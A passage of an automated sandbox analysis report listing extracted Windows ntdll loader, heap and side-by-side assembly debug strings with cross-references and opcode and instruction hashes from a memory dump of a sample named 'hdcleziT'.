                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                    • API String ID: 0-1357697941
                                                                                                    • Opcode ID: 6a0f005a0d47bd55adf6d466f25b4afc08eeec628a74db74e84af48b0c92d313
                                                                                                    • Instruction ID: 86856cb53799bbb5b8a1fd954fdfb7bf68d1c44951d4f13e9dd4fa292466982b
                                                                                                    • Opcode Fuzzy Hash: 6a0f005a0d47bd55adf6d466f25b4afc08eeec628a74db74e84af48b0c92d313
                                                                                                    • Instruction Fuzzy Hash: 76F13931A00266EFDB17CF68E490BAABBF6FF09304F44845DE5829B652D734A985CF50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                    • API String ID: 0-1700792311
                                                                                                    • Opcode ID: 704f4ffd446ef0a44e1a1a15ba5997af3a15cee3055125a6fdc7c00af6b55dbb
                                                                                                    • Instruction ID: 3ebf73482c274ac99f124acb13a26c463f7ec76cf21144eb437d215027cee816
                                                                                                    • Opcode Fuzzy Hash: 704f4ffd446ef0a44e1a1a15ba5997af3a15cee3055125a6fdc7c00af6b55dbb
                                                                                                    • Instruction Fuzzy Hash: 23D1D035A00695DFDB13CFA8E450AADBBF2FF5A304F44805DE946AB252D734A981CF50
                                                                                                    Strings
                                                                                                    • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 24D34E38
                                                                                                    • Execute '.cxr %p' to dump context, xrefs: 24D34EB1
                                                                                                    • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 24D34DF5
                                                                                                    • LdrpProtectedCopyMemory, xrefs: 24D34DF4
                                                                                                    • minkernel\ntdll\ldrutil.c, xrefs: 24D34E06
                                                                                                    • LdrpGenericExceptionFilter, xrefs: 24D34DFC
                                                                                                    • ***Exception thrown within loader***, xrefs: 24D34E27
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                                    • API String ID: 0-2973941816
                                                                                                    • Opcode ID: 1e920670e81ee462596a1d327b787837c3254eb83c10e82f33e5820f43b1a9b7
                                                                                                    • Instruction ID: bdc86a83c36c4dd0e5354268bedb6eff6462e3fff3d53d61a4241523635f76ff
                                                                                                    • Opcode Fuzzy Hash: 1e920670e81ee462596a1d327b787837c3254eb83c10e82f33e5820f43b1a9b7
                                                                                                    • Instruction Fuzzy Hash: 662126721440017BE3058BAC9E91E367FEEFB855E4F10011DF221BB599CA58FE00CE61
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                    • API String ID: 0-4098886588
                                                                                                    • Opcode ID: 5270e6d284584e14945266e82a3f7c6e9c9baa7b77ddc9e5baa381ad13cf2dce
                                                                                                    • Instruction ID: 2b72537aa0a7d7a62a8c4989f2a3fd5e5608f3f316725405fc2981cde77bb539
                                                                                                    • Opcode Fuzzy Hash: 5270e6d284584e14945266e82a3f7c6e9c9baa7b77ddc9e5baa381ad13cf2dce
                                                                                                    • Instruction Fuzzy Hash: 5232A175A042698BEF22CF59C894BDEBBB6BF44340F1441E9E888A7251E7719F81CF50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000001.2169352887.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_1_400000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <$VUUU$^$gfff$gfff$yxxx
                                                                                                    • API String ID: 0-316815425
                                                                                                    • Opcode ID: b4c5ea56440ed441900d5c47d19ed93f1dc6d542dd1d6fd463edbf0af6dc037a
                                                                                                    • Instruction ID: acdc47fa774a7f9690a8a9d900611673f9bdcf880e58a562d9d8aaaed250525f
                                                                                                    • Opcode Fuzzy Hash: b4c5ea56440ed441900d5c47d19ed93f1dc6d542dd1d6fd463edbf0af6dc037a
                                                                                                    • Instruction Fuzzy Hash: 6B81D471B005054BDF2CCD5DDA987AA73A6EBD4304F28817AD809EF3D1EA799E058A44
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-792281065
                                                                                                    • Opcode ID: 19d7c66cfe2851c32e11b4436b323ce87085773072db7be2294dc0afe8bf5b57
                                                                                                    • Instruction ID: 87828449faed0c7128a0de4633b1150daba18f82280119bf511d56071b5c9e9c
                                                                                                    • Opcode Fuzzy Hash: 19d7c66cfe2851c32e11b4436b323ce87085773072db7be2294dc0afe8bf5b57
                                                                                                    • Instruction Fuzzy Hash: AF911630F01625ABEB16DF29C8A4B6A7BA3FF50B28F40416DE9147B6C6D7749801CB91
                                                                                                    Strings
                                                                                                    • \WinSxS\, xrefs: 24CE2E23
                                                                                                    • SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx, xrefs: 24D22706
                                                                                                    • @, xrefs: 24CE2E4D
                                                                                                    • SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx, xrefs: 24D2276F
                                                                                                    • .Local\, xrefs: 24CE2D91
                                                                                                    • SXS: Unable to open registry key %wZ Status = 0x%08lx, xrefs: 24D2279C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .Local\$@$SXS: Attempt to get storage location from subkey %wZ failed; Status = 0x%08lx$SXS: Unable to enumerate assembly storage subkey #%lu Status = 0x%08lx$SXS: Unable to open registry key %wZ Status = 0x%08lx$\WinSxS\
                                                                                                    • API String ID: 0-3926108909
                                                                                                    • Opcode ID: 9939ec9f61bc78461b6880ce060b55edf041544a004ecdac026bf5d5d0c065a2
                                                                                                    • Instruction ID: 23f557b71f124814034675ed95770e91f3ac40bd378ebd96c67260f07afbd504
                                                                                                    • Opcode Fuzzy Hash: 9939ec9f61bc78461b6880ce060b55edf041544a004ecdac026bf5d5d0c065a2
                                                                                                    • Instruction Fuzzy Hash: 8481BF712083419FD702CF19C890B6BBBE6AF95704F04895DF984CF28AD774DA44CBA2
                                                                                                    Strings
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 24D09A11, 24D09A3A
                                                                                                    • apphelp.dll, xrefs: 24CA6496
                                                                                                    • Loading the shim user DLL failed with status 0x%08lx, xrefs: 24D09A2A
                                                                                                    • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 24D099ED
                                                                                                    • Getting the shim user exports failed with status 0x%08lx, xrefs: 24D09A01
                                                                                                    • LdrpInitShimEngine, xrefs: 24D099F4, 24D09A07, 24D09A30
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-204845295
                                                                                                    • Opcode ID: 6d6eaf9dc6781dc9ac3abc11c7f3ec3539e5cd9d4c68d6f12d72bfa2a3c76f8b
                                                                                                    • Instruction ID: 9f1f74319db150d613b464c077aa417a02e3945b4230f3287ffc54ad3735fcdb
                                                                                                    • Opcode Fuzzy Hash: 6d6eaf9dc6781dc9ac3abc11c7f3ec3539e5cd9d4c68d6f12d72bfa2a3c76f8b
                                                                                                    • Instruction Fuzzy Hash: 9A518171608314AFE321DF28C890F6B77EAFB94B44F00496DF5959B2A4DB30D944CB92
                                                                                                    Strings
                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 24D28181, 24D281F5
                                                                                                    • LdrpInitializeImportRedirection, xrefs: 24D28177, 24D281EB
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 24CEC6C3
                                                                                                    • LdrpInitializeProcess, xrefs: 24CEC6C4
                                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 24D28170
                                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 24D281E5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                    • API String ID: 0-475462383
                                                                                                    • Opcode ID: 076cecf89185d6642e76722ed9aff36e7a456388445a5e1b2d7a4a8a625b3947
                                                                                                    • Instruction ID: 7ee1287c800ab48dd07ff8eb4089950463f6dbcd2a12df88c89305db57909868
                                                                                                    • Opcode Fuzzy Hash: 076cecf89185d6642e76722ed9aff36e7a456388445a5e1b2d7a4a8a625b3947
                                                                                                    • Instruction Fuzzy Hash: 31310472744741AFD211DF2CCD55E2A7BD6EF94714F000668F944AB29AE720DC04CBA2
                                                                                                    Strings
                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 24D22180
                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 24D22165
                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 24D221BF
                                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 24D22160, 24D2219A, 24D221BA
                                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 24D2219F
                                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 24D22178
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                    • API String ID: 0-861424205
                                                                                                    • Opcode ID: 6d43cf13aa6bff3e8ed2d1974506706284d7dc03e38252d94f124789f376e9e0
                                                                                                    • Instruction ID: a2dc694c34fd55560d88cbae2f06798190dcd346c636c16ae2768e0c7d2e735f
                                                                                                    • Opcode Fuzzy Hash: 6d43cf13aa6bff3e8ed2d1974506706284d7dc03e38252d94f124789f376e9e0
                                                                                                    • Instruction Fuzzy Hash: 2131E976F02514B7F712CA9ACC90F6B7BEADB64654F05006DFA08BF149D7309A01CAA1
                                                                                                    APIs
                                                                                                      • Part of subcall function 24CF2DF0: LdrInitializeThunk.NTDLL ref: 24CF2DFA
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 24CF0BA3
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 24CF0BB6
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 24CF0D60
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 24CF0D74
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 1404860816-0
                                                                                                    APIs
                                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 24D3CFBD
                                                                                                    Similarity
                                                                                                    • API ID: CallFilterFunc@8
                                                                                                    • String ID: @$@4Cw@4Cw
                                                                                                    • API String ID: 4062629308-3101775584
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                    • API String ID: 0-379654539
                                                                                                    Strings
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 24CE8421
                                                                                                    • @, xrefs: 24CE8591
                                                                                                    • LdrpInitializeProcess, xrefs: 24CE8422
                                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 24CE855E
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-1918872054
                                                                                                    Strings
                                                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 24D155AE
                                                                                                    • HEAP[%wZ]: , xrefs: 24D154D1, 24D15592
                                                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 24D154ED
                                                                                                    • HEAP: , xrefs: 24D154E0, 24D155A1
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                    • API String ID: 0-1657114761
                                                                                                    Strings
                                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 24D222B6
                                                                                                    • SXS: %s() passed the empty activation context, xrefs: 24D221DE
                                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 24D221D9, 24D222B1
                                                                                                    • .Local, xrefs: 24CE28D8
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                    • API String ID: 0-1239276146
                                                                                                    Strings
                                                                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 24D11028
                                                                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 24D10FE5
                                                                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 24D1106B
                                                                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 24D110AE
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                    • API String ID: 0-1468400865
                                                                                                    Strings
                                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 24D23640, 24D2366C
                                                                                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 24D2365C
                                                                                                    • LdrpFindDllActivationContext, xrefs: 24D23636, 24D23662
                                                                                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 24D2362F
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                    • API String ID: 0-3779518884
                                                                                                    Strings
                                                                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 24D1A992
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 24D1A9A2
                                                                                                    • apphelp.dll, xrefs: 24CD2462
                                                                                                    • LdrpDynamicShimModule, xrefs: 24D1A998
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-176724104
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                    • API String ID: 0-4253913091
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                                    • API String ID: 0-2779062949
                                                                                                    Strings
                                                                                                    • @, xrefs: 24CACD63
                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 24CACD34
                                                                                                    • InstallLanguageFallback, xrefs: 24CACD7F
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                    • API String ID: 0-1757540487
                                                                                                    Strings
                                                                                                    • Failed to reallocate the system dirs string !, xrefs: 24D282D7
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 24D282E8
                                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 24D282DE
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-1783798831
                                                                                                    Strings
                                                                                                    • PreferredUILanguages, xrefs: 24D6C212
                                                                                                    • @, xrefs: 24D6C1F1
                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 24D6C1C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                    • API String ID: 0-2968386058
                                                                                                    • Opcode ID: b71ef65150382686c45b30b1471706c42b189f0e4e1a4ddaff5cd084c73090a8
                                                                                                    • Instruction ID: 41ecce8f26bb884f53ae89cd3fda97791264d5975072a5f81ea56e31c82527be
                                                                                                    • Opcode Fuzzy Hash: b71ef65150382686c45b30b1471706c42b189f0e4e1a4ddaff5cd084c73090a8
                                                                                                    • Instruction Fuzzy Hash: BF416371E00219EFDB11CFD8D890FDEBBB9BB18B04F10456AEA06B7258D7749A44CB50
                                                                                                    Strings
                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 24D34899
                                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 24D34888
                                                                                                    • LdrpCheckRedirection, xrefs: 24D3488F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                    • API String ID: 0-3154609507
                                                                                                    • Opcode ID: 623c3aad6b9e384091f2613083cd721c7ff26858aa01382d319a1e9bec032f9c
                                                                                                    • Instruction ID: f3b854591409695853e7dbd715ac74d8b74641bda82fd222a6691a294a5548be
                                                                                                    • Opcode Fuzzy Hash: 623c3aad6b9e384091f2613083cd721c7ff26858aa01382d319a1e9bec032f9c
                                                                                                    • Instruction Fuzzy Hash: 8D41AC72A156609FCB12CE69C940A167FE9FB89B50B0105ADED98AB311E728FC00CF91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                    • API String ID: 0-1373925480
                                                                                                    • Opcode ID: b5ca4860bd0c8c7bcd0ea653e90252eaee4fe0bc62d3612b862c5ee56d49889b
                                                                                                    • Instruction ID: 2b7a36da369d35ae459a4777dc64b4b9d9031ca9bcd650bd4afdd8efcdf737d2
                                                                                                    • Opcode Fuzzy Hash: b5ca4860bd0c8c7bcd0ea653e90252eaee4fe0bc62d3612b862c5ee56d49889b
                                                                                                    • Instruction Fuzzy Hash: 20411371E01698CBEB12CB98C880B9DBBF9FF55340F10045ED941EB795DB75A981CB11
                                                                                                    Strings
                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 24D32104
                                                                                                    • LdrpInitializationFailure, xrefs: 24D320FA
                                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 24D320F3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                    • API String ID: 0-2986994758
                                                                                                    • Opcode ID: ad42e55d5b4cd3adf0998e0176890259ebf9eef99799d5ab31d40de02bc239fd
                                                                                                    • Instruction ID: 602ddecca22f92b34e3b5c999fd6624d9f2e966f2dbc3eed87792db32eb2badc
                                                                                                    • Opcode Fuzzy Hash: ad42e55d5b4cd3adf0998e0176890259ebf9eef99799d5ab31d40de02bc239fd
                                                                                                    • Instruction Fuzzy Hash: 72F0C231A00258BBE710D64CCDA2FAA7BEAFB40B58F100059F6447B289D6B4A900CE95
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: #%u
                                                                                                    • API String ID: 48624451-232158463
                                                                                                    • Opcode ID: f3ed4a7be82c5c96a039ed04299f84efff4e4d09bd608bf461513b660b76ea08
                                                                                                    • Instruction ID: c52a3337645ba1a274dc013915f770c6e3d8f0d83acf629d18d64e48f8c7d464
                                                                                                    • Opcode Fuzzy Hash: f3ed4a7be82c5c96a039ed04299f84efff4e4d09bd608bf461513b660b76ea08
                                                                                                    • Instruction Fuzzy Hash: 9B714B71A001499FDB01CFA9D990FAEBBF9FF08744F154069E904E7255EA34EE01CB64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @4Cw@4Cw$PATH
                                                                                                    • API String ID: 0-1794901795
                                                                                                    • Opcode ID: 49260cb1285682be7b9e540e4295aac28f4d68b70bd8e41139f06184ee27fc23
                                                                                                    • Instruction ID: e9067ecd69dae008405c4e68c945e66c18d5f91610ba18683592d560a80a7382
                                                                                                    • Opcode Fuzzy Hash: 49260cb1285682be7b9e540e4295aac28f4d68b70bd8e41139f06184ee27fc23
                                                                                                    • Instruction Fuzzy Hash: FCF19275E00229DBDB15CF9DD880AAEBBB6FF48700F594069F580BB360D7B4A941CB61
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: `$`
                                                                                                    • API String ID: 0-197956300
                                                                                                    • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                    • Instruction ID: f632d5a2d7355551ce6eaf72fa5493a9c91598c4ed9576ca7e1485a948046883
                                                                                                    • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                    • Instruction Fuzzy Hash: 0DC1DD312083429BEB15CF28CC81B2BBBF6BFC4718F044A2DF6958A290D775D505CB92
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 24C80000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_24c80000_hdcleziT.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: Legacy$UEFI
                                                                                                    • API String ID: 2994545307-634100481
                                                                                                    • Opcode ID: fec307ed9d77f80538723e7c01d5856996315d4ba584e732d05be75839e3d9ef
                                                                                                    • Instruction ID: abcf5aa9abd5a6ec1338dcfb8143af26d1f5c3ee25981311b4ba038e5b23a815
